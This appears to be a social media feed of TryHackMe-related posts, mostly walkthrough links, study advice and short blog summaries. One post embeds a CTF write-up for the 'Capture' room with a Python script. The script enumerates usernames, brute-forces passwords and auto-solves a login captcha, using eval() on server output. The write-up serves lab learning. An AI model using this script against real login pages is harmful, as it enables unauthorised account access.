#tryhackme
How the new TryHackMe approaches the SOC Level 1 path to the real world Security Analyst role: From lots of general tooling to specific SIEM and detection!

#TryHackMe #SOC #BlueTeam
The new TryHackMe SOC Level 1 Path
Now getting ready for the job got even better
medium.com
November 12, 2025 at 10:58 AM
TryHackMe’s Live Attacks challenge plus Snort → hands-on IDS rule writing and real-time detection. I walked the labs and share the exact rules I used.

#TryHackMe #IDS #Snort
Mastering Snort: Stopping Real-Time Attacks from the TryHackMe “Live Attacks” Challenge
Learn how to detect and block brute-force and reverse shell attacks using Snort IDS/IPS — step-by-step, hands-on, and beginner-friendly.
medium.com
November 12, 2025 at 10:56 AM
📌 The Helpful Hacker: A Game-Changer for TryHackMe Enthusiasts https://www.cyberhub.blog/article/15466-the-helpful-hacker-a-game-changer-for-tryhackme-enthusiasts
The Helpful Hacker: A Game-Changer for TryHackMe Enthusiasts
TryHackMe is a popular platform for learning cybersecurity through practical exercises. The YouTube channel *The Helpful Hacker* offers walkthroughs for these exercises, providing clear and structured explanations that make complex topics accessible. This resource is praised for its clarity and pacing, making it useful for both beginners and advanced users. The channel's ability to break down complex topics can enhance learning and practical skills, bridging the gap between theory and practice. However, users should engage actively with the material to avoid superficial understanding. The channel's credibility within the THM community suggests it's a trusted resource, but users should always verify the content. Overall, *The Helpful Hacker* is a valuable resource that can democratize access to cybersecurity knowledge, making it easier for individuals to enter the field. By providing structured and clear explanations, the channel can help address the skills gap in cybersecurity by making learning more accessible. However, it's crucial for learners to attempt challenges on their own first to develop problem-solving skills and a deeper understanding of the concepts. As a cybersecurity professional, I recommend using such resources as a supplement to active learning and continuous practice. Staying up-to-date with the latest threats and defenses is essential in this constantly evolving field.
www.cyberhub.blog
November 11, 2025 at 4:20 PM
If you don't have a PC yet, don't let this stop you!

- Professor Messer series on Youtube is amazing

- TryHackMe has mobile-friendly rooms like the Pre-Security Path

- Coursera has an app , look for the google cybersec

I mean, grab a pen and paper, take notes.... DO SOMETHING!!🔨🔨🔨
November 11, 2025 at 10:51 AM
Here are some FREE platforms to get hands-on cybersecurity experience:

1. Cybrary
2.TryHackMe
3. OverTheWire
4. HackTheBox
5. LetsDefend
6. PicoCTF
November 11, 2025 at 7:08 AM
📌 TryHackMe's W1seGuy challenge involves decrypting XOR encoded text to find the key and flag. #CyberSecurity #TryHackMe https://tinyurl.com/287dehnl
Understanding the CTF Try Hack Me - W1seGuy Challenge
The CTF Try Hack Me - W1seGuy challenge involves decrypting an XOR encoded text to find the encrypti...
tinyurl.com
November 10, 2025 at 10:10 PM
📌 TryHackMe Co-Founder Hosts AMA on Cybersecurity Skills, SOC/IR Maturity, and Industry Entry https://www.cyberhub.blog/article/15427-tryhackme-co-founder-hosts-ama-on-cybersecurity-skills-socir-maturity-and-industry-entry
TryHackMe Co-Founder Hosts AMA on Cybersecurity Skills, SOC/IR Maturity, and Industry Entry
Ashu, co-founder of TryHackMe, is hosting an Ask Me Anything (AMA) session on Reddit's cybersecurity subreddit. The AMA focuses on critical topics such as breaking into the cybersecurity industry, essential cybersecurity skills, and strategies for maturing Security Operations Center (SOC) and Incident Response (IR) teams. Ashu brings extensive experience in security consulting and penetration testing, with a particular emphasis on Cloud/AWS environments. TryHackMe is a popular platform that offers hands-on cybersecurity training through interactive challenges and labs. This AMA presents an opportunity for cybersecurity professionals and aspirants to gain insights from a seasoned expert in the field. One of the key topics of discussion is the cybersecurity skills gap. Ashu's perspective on this issue is valuable, given TryHackMe's role in providing practical, hands-on training. The skills gap remains a significant challenge in the industry, with a high demand for skilled professionals and a shortage of qualified candidates. Platforms like TryHackMe are crucial in addressing this gap by offering accessible and practical training. Another critical topic is the impact of AI in security environments. AI is increasingly being integrated into SOC and IR operations to enhance threat detection, automate responses, and improve overall efficiency. Ashu's insights on this topic could provide valuable guidance on how to leverage AI effectively in cybersecurity operations. Additionally, the AMA will cover strategies for maturing SOC and IR teams. Ashu's experience in security consulting and penetration testing can offer practical advice on building and improving these teams, which are essential for any organization's cybersecurity posture. The AMA also aims to support individuals seeking roles in cybersecurity. Ashu's expertise and TryHackMe's resources can provide valuable guidance for those looking to enter the field, highlighting the necessary skills and pathways to success. In conclusion, this AMA session by Ashu offers a unique opportunity to gain insights into critical cybersecurity topics from an industry expert. It is a valuable resource for both aspiring cybersecurity professionals and seasoned practitioners looking to enhance their skills and knowledge.
www.cyberhub.blog
November 10, 2025 at 4:20 PM
Ashu, co-founder of TryHackMe, invites questions about cybersecurity skills, breaking into the industry, and enhancing SOC & IR team maturity. He specializes in Cloud/AWS and is keen to discuss AI's impact on cybersecurity skills and supporting individuals entering the field.
AMA: I'm the co-founder at TryHackMe. Ask me about breaking into the industry, cyber security skills and how to make SOC & IR teams more mature!
Hey everyone! I'm Ashu - one of the co-founders at TryHackMe. I have background in security consulting/penetrating test, specialising in Cloud / AWS. Happy to answer any and all questions abou...
reddit.com
November 10, 2025 at 2:42 PM
Join me on the walkthrough of this TryHackMe room on EDRs (Endpoint Detection and Response). Let's keep grinding!
www.jalblas.com/blog/thm-int...
TryHackMe: Introduction to EDR Walkthrough (SOC Level 1)
In this introduction to EDR (Endpoint Detection and Response) we learn how EDR help monitor, detect, and respond to advanced threats at the endpoint level.
www.jalblas.com
November 10, 2025 at 1:04 PM
📌 Understanding the Significance of TryHackMe Scores in Cybersecurity Training https://www.cyberhub.blog/article/15419-understanding-the-significance-of-tryhackme-scores-in-cybersecurity-training
Understanding the Significance of TryHackMe Scores in Cybersecurity Training
The Reddit post in question presents an image showing a score of 67, likely from a TryHackMe challenge or room. TryHackMe is a popular online platform that offers hands-on cybersecurity training through virtual machines and real-world scenarios. While the exact context of the score is unclear, it underscores the importance of such platforms in cybersecurity education and skill development. In the cybersecurity field, practical experience is invaluable. Platforms like TryHackMe provide a safe and legal environment for professionals to practice offensive and defensive security techniques. A score of 67 could represent a user's progress or achievement in a specific challenge, reflecting their proficiency in areas such as penetration testing, vulnerability assessment, or incident response. The broader implications of such platforms are significant. They foster continuous learning and skill development, which are crucial given the dynamic nature of cybersecurity threats. By engaging with these platforms, professionals can stay updated with the latest techniques and threats, enhancing their ability to protect systems and data. Moreover, platforms like TryHackMe encourage a sense of community and competition, motivating individuals to improve their skills. This can have a positive impact on the overall cybersecurity landscape by increasing the number of skilled professionals. For organizations, encouraging cybersecurity teams to participate in such platforms can be beneficial. It ensures that teams are well-prepared to handle emerging threats and vulnerabilities, ultimately strengthening the organization's security posture. In conclusion, while the specific details of the score of 67 are unclear, the broader implications of platforms like TryHackMe are significant. They play a crucial role in skill development and continuous learning, which are essential in the ever-evolving field of cybersecurity. Cybersecurity professionals and organizations should consider leveraging such platforms for training and skill enhancement.
www.cyberhub.blog
November 10, 2025 at 12:20 PM
TryHackMe — File Inclusion — Walkthrough TryHackMe — File Inclusion — Walkthrough Welcome to this walkthrough of the File Inclusion room on TryHackMe. Remember that this pos...

#remote-file-inclusion #tryhackme #cybersecurity #local-file-inclusion #tryhackme-walkthrough

Origin | Interest | Match
TryHackMe — File Inclusion — Walkthrough
Welcome to this walkthrough of the File Inclusion room on TryHackMe. Remember that this post will contain the answers to the questions. I…
systemweakness.com
November 12, 2025 at 8:34 AM
INVESTIGATING WINDOWS- TRY HACK ME- ROOM Hello everyone! This is a beginner-friendly somewhat forensic type room from the TryHackMe platform titled “ Investigating Windows ” This room is classi...

#tryhackme-walkthrough #tryhackme-writeup #cybersecurity #ctf-writeup #tryhackme

Origin | […]
Original post on systemweakness.com
systemweakness.com
November 9, 2025 at 2:12 PM
Capture: A TryHackMe CTF writeup
Capture: A TryHackMe CTF writeup
In this write-up, we are going to bypass the login form of a vulnerable web application and then using Python script to automate the process Room Link : https://tryhackme.com/room/capture Room Description : SecureSolaCoders has once again developed a web application. They were tired of hackers enumerating and exploiting their previous login form. They thought a Web Application Firewall (WAF) was too overkill and unnecessary, so they developed their own rate limiter and modified the code slightly AI generated Gettting ready to hunt Start the target machine & Download Task Files Boot your attack box Connect to the TryHackMe network Download Task Files 1️⃣ Analyze the Task Files Once you download and unzip the Task Files, here is what it contains Task Files From the above files ( username.txt & passwords.txt ) we can say that the task is to brute force the login page and find the correct credentials 2️⃣Understanding the Login page functionality You might encounter following web page when you first visit the IP address in your browser Login Page After trying multiple incorrect credentials from the task files ( username.txt & password.txt ), captcha was enabled to prevent brute force attacks Captcha enabled So, we need to solve the captcha each time to verify the username and password. Let’s capture this request in BurpSuite POST request captured in BurpSuite Above you can see the parameters that a POST request contains, so it is clear that we have to pass these three parameters on each request to verify the username &  password 3️⃣Code the process To automate this process I developed my custom python script to find the correct credentials. Following are the code snippets of the python script along explanation to each function used in the script: 1. Import required libraries import sys import requests import urllib3 import re urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) proxies={'http':'http://127.0.0.1:8080', 'https':'http://127.0.0.1:8080'} s=requests.session() reg_pattern= r'\d{1,}\s(.)\s\d{1,}' import sys It provides access to system parameters and allowing users to interact with the program such as taking a parameter value from user import requests to deal with web requests and response from the server import urllib3 to deal with URLs import re using regular expression tool to match for specific patters the proxies variable contains the value to web proxy server, in this case we are using BurpSuite reg_pattern is the pattern to extract captcha value from the response and perform operations on it 2. Extract captcha from the response def get_captcha(url): data= {'username':'test','password':'testpass'} #Missing captcha res=s.post(url=url, proxies=proxies, verify=False, data=data) challenge=re.search(reg_pattern, res.text) solution=eval(challenge.group().strip()) return solution this function is used to make web request and solve the captcha challenge from the response using in-built eval() function 3. Enumerate username From the response, you can see that website says ‘ The user rachel does not exist ’ instead it should response that ‘ The username or password is invalid ’ . This improper response allows attacker to enumerate the username: def user_enum(url,user_list,captcha): print("(+) Enumerating users...") with open(user_list, 'r') as file: for username in file: username = username.strip() if username: data={'username':username,'password':'testpass','captcha':captcha} res=s.post(url=url, proxies=proxies, verify=False, data=data) if "does not exist" in res.text: print(username) elif "Invalid captcha" in res.text: print("[-] Invalid captcha") else: print(f"[+] Username found: {username}") return username, captcha challenge=re.search(reg_pattern, res.text) captcha=eval(challenge.group().strip()) 4. Enumerate password After finding the valid username pass_enum function is called to enumerate the password def pass_enum(url, username, pass_list, captcha): print("(+) Enumerating password...") with open(pass_list, 'r') as file: for password in file: password = password.strip() if password: data= {'username':username,'password':password,'captcha':captcha} res=requests.post(url=url, proxies=proxies, verify=False, data=data) if "Invalid password" in res.text: print(f"{username}:{password}") elif "Invalid captcha" in res.text: print("[-] Invalid captcha") else: print(f"[+] Password found: {password}") return password challenge=re.search(reg_pattern, res.text) captcha=eval(challenge.group().strip()) Main function Input required values from the user and call the functions as required if __name__ == "__main__": if len(sys.argv)!=4: print("[+] Usage: %s URL path_to_user_wordlist path_to_pass_wordlist" %sys.argv[0]) print("[+] Example: %s http://10.201.118.234/login users.txt pass.txt" %sys.argv[0]) sys.exit(-1) url=sys.argv[1].strip() user_list=sys.argv[2].strip() pass_list=sys.argv[3].strip() for i in range(0,10): #Trigger rate limiting, captcha challenge params={'username':'test', 'password':'test'} res=requests.post(url=url, data=params, verify=False, proxies=proxies) if "Invalid captcha" in res.text: break captcha=get_captcha(url) username,captcha=user_enum(url,user_list,captcha) password=pass_enum(url,username,pass_list,captcha) print(f"[+] Credentials {username}:{password}") You can automate the process and find the valid credentials using following Python script WebHacking_Playground/Auth_bypass/Capture/script.py at main · HuzaifaxMalik/WebHacking_Playground Now, run the script: Script in action Note: Before executing this script, keep your BurpSuite running, because this script requires a web proxy tool listening on port 8080 Credentials found Credentials found Login to the web page using credentials found above, here is the flag.txt : ‘flag’ found That’s the end :) If you want more web hacking techniques and articles on CTF lab, follow me here on Medium for detailed write-ups. Connect with me on LinkedIn ( https://www.linkedin.com/in/huzaifa-x-malik ) for professional discussions. You can also join me on X ( https://www.x.com/Huzaifa_X_Malik ) for quick tips, techniques, and thoughts from the world of offensive security Capture: A TryHackMe CTF writeup was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.
infosecwriteups.com
November 9, 2025 at 10:06 AM
i have yet to find a satisfactory use for AI in my daily life. short of using the AI helper on tryhackme, an AI tool has yet to improve on what I can already do
A friend recently texted me the same thing. “Do you really not use ChatGPT?!” It was a sign of where we are culturally on this. People are compelled to use it but also starting to question the normalcy?
Recently met someone who was very surprised to hear I didn’t use ChatGPT or any LLM.

I said my job depended on doing distinctive work. That was my selling point. If I started to sound like ChatGPT and turn out what it did, then how on earth could I justify doing it? What would that make me?
November 8, 2025 at 1:48 PM
📌 New TryHackMe challenge "Lian_Yu" released. Easy level, focuses on digital forensics and penetration testing. #CyberSecurity #TryHackMe https://tinyurl.com/27dkm38e
New TryHackMe Challenge!
🎯 New TryHackMe Challenge! Lian_Yu 🟢 Difficulty: easy 📝 Description A beginner level security challenge 🏷️ Tags Digital forensics, Penetration testing, Linux, Web, ffuf, Red 🔗 Start the challenge: https://tryhackme.com/room/lianyu
tinyurl.com
November 8, 2025 at 10:42 AM
Network Forensics with NetworkMiner — Investigating PCAP files in TryHackMe’s NetworkMiner Overview 1 Room.

I walk through host discovery, credential extraction, and identifying potential indicators of compromise.

#CyberSecurity #DigitalForensics #TryHackMe #NetworkMiner #InfoSec
Network Forensics with NetworkMiner
Investigating PCAP files in TryHackMe’s NetworkMiner Overview 1 Room
medium.com
November 7, 2025 at 10:53 AM
The Zero-Click Nightmare: How I Exploited a Critical Flaw and What It Means for Your API Security

Introduction: A recent responsible disclosure by a security researcher has unveiled a critical authentication bypass vulnerability within a TryHackMe learning path. This exploit, requiring zero user…
The Zero-Click Nightmare: How I Exploited a Critical Flaw and What It Means for Your API Security
Introduction: A recent responsible disclosure by a security researcher has unveiled a critical authentication bypass vulnerability within a TryHackMe learning path. This exploit, requiring zero user interaction, allowed unauthorized access to premium training modules and sensitive user data, serving as a stark reminder of the fragility of modern API-driven authentication systems. This incident transcends a single platform, highlighting a systemic threat to educational technology and corporate learning management systems (LMS) worldwide.
undercodetesting.com
November 7, 2025 at 9:40 AM
leetcodeのstreak途切れてからtryhackmeに逃げている
November 7, 2025 at 9:09 AM
📌 Top TryHackMe Rooms for Enhancing Pentesting Skills: Community Recommendations https://www.cyberhub.blog/article/15281-top-tryhackme-rooms-for-enhancing-pentesting-skills-community-recommendations
Top TryHackMe Rooms for Enhancing Pentesting Skills: Community Recommendations
The Reddit post under analysis is from a user seeking to improve their pentesting skills through TryHackMe (THM) rooms. Several community members have provided recommendations, highlighting rooms and paths that are particularly beneficial for skill development. Notable mentions include the "Offensive Pentesting" path, which offers a comprehensive curriculum on offensive security techniques. The "Advent of Cyber" series is praised for its engaging and diverse challenges, making it a favorite among users. Other recommended rooms include "Overpass," which focuses on web application security and privilege escalation, and "Blue," which deals with Windows machine enumeration and privilege escalation. Additionally, rooms like "Pickle Rick," "Bounty Hacker," and those based on the OWASP Top 10 vulnerabilities are highlighted for their practical and challenging content. Tools-specific rooms such as "Metasploit," "Burp Suite," and "Nmap" are also recommended for their focus on essential pentesting tools. These recommendations underscore the importance of hands-on practice in developing pentesting skills. The variety of rooms suggested covers a broad spectrum of topics, from web application security to network scanning and privilege escalation, providing a well-rounded learning experience. For cybersecurity professionals looking to enhance their pentesting skills, these THM rooms offer valuable, practical training in a safe and legal environment. Engaging with these challenges can significantly improve one's ability to identify and exploit vulnerabilities, ultimately contributing to a stronger security posture for organizations.
www.cyberhub.blog
November 6, 2025 at 10:20 PM
🎓Start learning cybersecurity with only a laptop and internet.
🔐 Free: Kali, Nmap, Metasploit, ZAP
🛠 Free: Wireshark, Burp, Volatility
🎯 Explore: TryHackMe, HTB, Shodan
No bootcamps. No cert theater. Break things, fix them, repeat.
#Cybersecuritybriangreenberg.net/resources/
November 6, 2025 at 7:42 PM
Find out how real-world intrusion detection works with my detailed Snort Challenge walkthrough. From writing rules to spotting exploits; a really comprehensive exercise.
#Cybersecurity #IDS #Snort #TryHackMe
Snort Challenge — The Basics Write-Up
Practicing IDS rule creation, syntax debugging, and exploit detection in TryHackMe
medium.com
November 6, 2025 at 11:32 AM
The fastest cybersecurity paycheck?
SOC Tier 1 or IAM Analyst.

Why?
•Repeatable workflows
•High turnover = opportunity
•Skill stack compounds fast

Study:
Security+
TryHackMe Blue/IR rooms
SIEM dashboards
Python basics

Not glamorous. Effective.
November 6, 2025 at 8:29 AM
Finished off the DevSecOps learning path yesterday on TryHackMe.

They updated the SOC Level 1 Path however, and even the older legacy version of the path (still active) has some updates. I'm going circle back around and re-clear the legacy path, then work through and finish the newer version.
November 5, 2025 at 9:16 PM